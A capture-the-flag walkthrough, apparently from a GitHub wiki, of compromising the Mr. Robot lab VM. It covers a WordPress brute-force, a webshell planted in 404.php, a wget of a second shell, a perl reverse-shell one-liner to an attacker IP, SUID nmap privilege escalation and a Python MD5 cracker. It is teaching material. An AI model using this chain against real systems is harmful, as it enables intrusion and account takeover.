mr.robot - danielcastropalomares/security GitHub Wiki
A first scan shows that only the web ports are open; SSH (22/tcp) is closed:
root@kali:~# nmap -A 172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-12 15:50 CET
Nmap scan report for 172.31.255.128
Host is up (0.00040s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:F3:16:D5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.40 ms 172.31.255.128
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds
root@kali:~# nmap -p- 172.31.255.128
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 08:00:27:F3:16:D5 (Oracle VirtualBox virtual NIC)
Scanning the web root with dirsearch (run through Osmedeus) and filtering for 200 responses, we find the following (readme.html, wp-login.php and wp-content/ give away WordPress):
root@kali:/usr/local/src/Osmedeus# cat /usr/local/src/Osmedeus/workspaces/172.31.255.128/directory/172.31.255.128-dirsearch.txt | grep 200
200 1KB http://172.31.255.128:80/admin/
200 1KB http://172.31.255.128:80/admin/?/login
200 1KB http://172.31.255.128:80/admin/index
200 1KB http://172.31.255.128:80/admin/index.html
200 0B http://172.31.255.128:80/favicon.ico
200 1KB http://172.31.255.128:80/index.html
200 504KB http://172.31.255.128:80/intro
200 19KB http://172.31.255.128:80/license.txt
200 10KB http://172.31.255.128:80/readme
200 10KB http://172.31.255.128:80/readme.html
200 41B http://172.31.255.128:80/robots.txt
200 0B http://172.31.255.128:80/sitemap
200 0B http://172.31.255.128:80/sitemap.xml
200 0B http://172.31.255.128:80/sitemap.xml.gz
200 0B http://172.31.255.128:80/wp-config.php
200 0B http://172.31.255.128:80/wp-content/
200 0B http://172.31.255.128:80/wp-content/plugins/google-sitemap-generator/sitemap-core.php
200 3KB http://172.31.255.128:80/wp-login.php
200 3KB http://172.31.255.128:80/wp-login
200 3KB http://172.31.255.128:80/wp-login/
robots.txt lists the following:
http://172.31.255.128/robots.txt
fsocity.dic
key-1-of-3.txt
The first is a wordlist:
http://172.31.255.128/fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
http
var
page
Robot
Elliot
styles
and
And the second is the first key:
http://172.31.255.128/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
We scan WordPress with wpscan. It reports no plugins and no config backups, but it does flag xmlrpc.php as reachable (XML-RPC's system.multicall lets a single request carry many login attempts, and pingbacks can be abused for SSRF and DoS) and identifies the version from the RSS generator tag:
root@kali:~# wpscan --force --wp-content-dir wp-admin --url http://172.31.255.128
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.4.0
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://172.31.255.128/
[+] Started: Sat Dec 22 19:53:44 2018
Interesting Finding(s):
[+] http://172.31.255.128/
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://172.31.255.128/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] http://172.31.255.128/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://172.31.255.128/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.3.18 identified (Latest, released on 2018-12-13).
| Detected By: Rss Generator (Aggressive Detection)
| - http://172.31.255.128/feed/, <generator>https://wordpress.org/?v=4.3.18</generator>
| - http://172.31.255.128/comments/feed/, <generator>https://wordpress.org/?v=4.3.18</generator>
[i] The main theme could not be detected.
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Sat Dec 22 19:53:46 2018
[+] Requests Done: 22
[+] Cached Requests: 27
[+] Data Sent: 9.665 KB
[+] Data Received: 186.248 KB
[+] Memory used: 47.199 MB
[+] Elapsed time: 00:00:02
If we open the WordPress login and try to log in as elliot, we get the following message. WordPress returns a different error for a non-existent account ("Invalid username"), so this message alone confirms that elliot exists (classic username enumeration):
http://172.31.255.128/wp-login.php
ERROR: The password you entered for the username elliot is incorrect. Lost your password?
Now we have the username; we only need the password. With nmap we launch a brute-force attack against the WordPress login, using fsocity.dic as the password list and user.txt, which contains just elliot, as the user list. fsocity.dic is highly redundant (most of its lines are repeats, leaving roughly 11k unique entries), so deduplicate it first with `sort -u fsocity.dic -o fsocity.dic` to keep the run short:
root@kali:/tmp# cat user.txt
elliot
root@kali:/tmp# nmap -sV -p 80 --script http-wordpress-brute -script-args 'passdb=/tmp/fsocity.dic,userdb=/tmp/user.txt' 172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 20:08 CET
Nmap scan report for 172.31.255.128
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
| http-wordpress-brute:
| Accounts:
| elliot:ER28-0652 - Valid credentials
|_ Statistics: Performed 11443 guesses in 230 seconds, average tps: 48.5
MAC Address: 08:00:27:F3:16:D5 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.81 seconds
With valid credentials we can log into the dashboard. The plan is to upload a PHP shell by editing the theme's 404 Template (404.php) from the built-in theme editor. This requires the account to have the edit_themes capability (an administrator) and the site not to set DISALLOW_FILE_EDIT in wp-config.php; elliot qualifies. This time I used the following shell:
https://raw.githubusercontent.com/JohnTroony/php-webshells/master/g00nshell-v1.3.php
Appearance > Editor > 404 Template
Once the changes are saved, we browse to the modified file. The path depends on the theme selected in the editor (the themes directory listing further down shows twentyfifteen, twentyfourteen and twentythirteen installed), so adjust the theme name to match:
http://172.31.255.128/wp-content/themes/twentysixteen/404.php
This shell is very limited, so we upload another one. Pasting the new shell directly into 404.php didn't work for me, so I chose to download it from within g00nshell instead:
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O wp-content/themes/shell.php
We open p0wny-shell:
http://172.31.255.128/wp-content/themes/shell.php
We check which user we are running as:
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
We look up its home directory:
grep daemon /etc/passwd
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
The SSH server is installed but not started: nothing listens on 22, and FTP (21), 2812 and MySQL (3306) are bound to localhost only. The PID/Program name column shows "-" because we are not root:
dpkg -l | grep ssh
ii openssh-client 1:6.6p1-2ubuntu2 amd64 secure shell (SSH) client, for secure access to remote machines
ii openssh-server 1:6.6p1-2ubuntu2 amd64 secure shell (SSH) server, for secure access from remote machines
ii openssh-sftp-server 1:6.6p1-2ubuntu2 amd64 secure shell (SSH) sftp server module, for SFTP access from remote machines
ii ssh 1:6.6p1-2ubuntu2 all secure shell client and server (metapackage)
ii ssh-import-id 3.21-0ubuntu1 all securely retrieve an SSH public key and install it locally
netstat -nltp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:21 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2812 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::443 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
Listing the current directory we find the following file:
ls -liath
30848 -rw-r--r-- 1 bitnamiftp daemon 33 Nov 13 2015 you-will-never-guess-this-file-name.txt
cat you-will-never-guess-this-file-name.txt
hello there person who found me.
We search for SUID binaries and find nmap, owned by root and sitting in /usr/local/bin rather than a package path, which is worth a second look:
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
ls -liath /usr/local/bin/nmap
34835 -rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
Next we get a reverse shell so we can work interactively. On our Kali box we start a netcat listener on port 8080:
root@kali:/tmp# nc -vlp 8080
listening on [any] 8080 ...
From the victim we run the following perl one-liner (it forks, connects back to 172.31.255.129:8080, and passes each line it receives to system()):
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.31.255.129:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Now we have a session directly on our Kali box:
root@kali:/tmp# nc -vlp 8080
listening on [any] 8080 ...
172.31.255.128: inverse host lookup failed: Unknown host
connect to [172.31.255.129] from (UNKNOWN) [172.31.255.128] 37278
ls
index.php
shell.php
twentyfifteen
twentyfourteen
twentythirteen
We upgrade the shell to a proper TTY with python's pty module:
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/themes$
We run nmap in interactive mode, which this old build (3.81) still supports (it has been removed from modern releases), spawn a shell with !sh and check our privileges. Note that only the effective uid is root while uid stays 1 (daemon): that is exactly what the SUID bit grants, and it is enough because file permission checks use the euid. It works because !sh runs /bin/sh (dash on Ubuntu), which keeps the effective uid; bash would drop it back to the real uid unless started with -p:
daemon@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/themes$ /usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
#
In the home directory of user robot we find key 2 of 3. The key file is readable only by robot (mode 0400), but with an effective uid of 0 that restriction does not apply to us:
# cd /home/robot
# ls
key-2-of-3.txt password.raw-md5
# ls -liath
total 16K
136109 -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
136108 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
130326 drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
22175 drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
# cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
#
password.raw-md5 holds an unsalted MD5 digest, so it is cracked rather than decrypted (a hash is not encryption). It turns out to be the MD5 of the lowercase alphabet, which any wordlist or lookup-table attack finds immediately:
c3fcd3d76192e4007dfb496cca67e13b : abcdefghijklmnopqrstuvwxyz
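A small raw-MD5 cracker, as an added Python example (not code from the write-up): it parses a password.raw-md5-style file, builds candidates from a wordlist plus cheap mangles and keyboard sequences, and hashes them once against every target. The digest is the one shown above; the "user:hash" line layout, the sample file contents and the candidate rules are assumptions.

```python
"""Crack the raw MD5 hash from password.raw-md5 (added example, not part of
the write-up). The digest is the one shown on the page; the 'user:hash'
line layout and the sample file are constructed assumptions. Candidate
generation covers a wordlist, simple mangles of each word, and keyboard
sequences such as the alphabet, which is what this hash turns out to be."""
import hashlib
import string

# Constructed sample in the assumed layout; the hash is the page's value.
SAMPLE_RAW_MD5 = "robot:c3fcd3d76192e4007dfb496cca67e13b\n# stray comment line\n"


def md5_hex(word):
    """Unsalted MD5 of the UTF-8 encoding, lowercase hex (what the file stores)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def parse_raw_md5(text):
    """Yield (label, digest) from 'hash' or 'user:hash' lines; skip anything else."""
    for line in text.splitlines():
        line = line.strip()
        label, sep, digest = line.rpartition(":")
        if not sep:
            label, digest = "", line
        digest = digest.lower()
        if len(digest) == 32 and all(c in string.hexdigits for c in digest):
            yield label, digest


def mangle(word):
    """Cheap rule set: case variants and a few common suffixes."""
    for w in sorted({word, word.lower(), word.upper(), word.capitalize()}):
        yield w
        for suffix in ("1", "123", "!", "2015"):
            yield w + suffix


def keyboard_sequences():
    """Sequences that show up constantly as 'passwords'."""
    yield string.ascii_lowercase
    yield string.ascii_uppercase
    yield string.digits
    yield "qwertyuiop"
    yield "1234567890"


def candidates(wordlist):
    """Keyboard sequences first, then each wordlist entry and its mangles, each once."""
    seen = set()
    sources = list(keyboard_sequences())
    for line in wordlist:
        sources.extend(mangle(line.strip()))
    for w in sources:
        if w and w not in seen:
            seen.add(w)
            yield w


def crack(entries, words):
    """One pass over the candidates for every target; returns {digest: plaintext}."""
    targets = {digest for _, digest in entries}
    found = {}
    for w in words:
        if len(found) == len(targets):
            break
        h = md5_hex(w)
        if h in targets and h not in found:
            found[h] = w
    return found


def crack_file(text, wordlist):
    """Parse the file and report label -> plaintext for every cracked line."""
    entries = list(parse_raw_md5(text))
    found = crack(entries, candidates(wordlist))
    return {label or digest: found[digest] for label, digest in entries if digest in found}


if __name__ == "__main__":
    # Offline demo on the constructed sample; for the real file pass its text and fsocity.dic lines.
    print(crack_file(SAMPLE_RAW_MD5, ["elliot", "robot"]))
```

For real wordlists the dedicated tools are faster: `hashcat -m 0 password.raw-md5 fsocity.dic` (add `--username` if the line carries a user prefix) or `john --format=raw-md5 password.raw-md5`.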
We move to /root and find the last key:
# cd /root
# pwd
/root
# ls -liath
total 32K
30845 -rw------- 1 root root 4.0K Nov 14 2015 .bash_history
33954 drwx------ 3 root root 4.0K Nov 13 2015 .
55578 -rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
34802 -r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt
394264 drwx------ 2 root root 4.0K Nov 13 2015 .cache
2 drwxr-xr-x 22 root root 4.0K Sep 16 2015 ..
35943 -rw-r--r-- 1 root root 3.2K Sep 16 2015 .bashrc
34851 -rw------- 1 root root 1.0K Sep 16 2015 .rnd
35944 -rw-r--r-- 1 root root 140 Feb 20 2014 .profile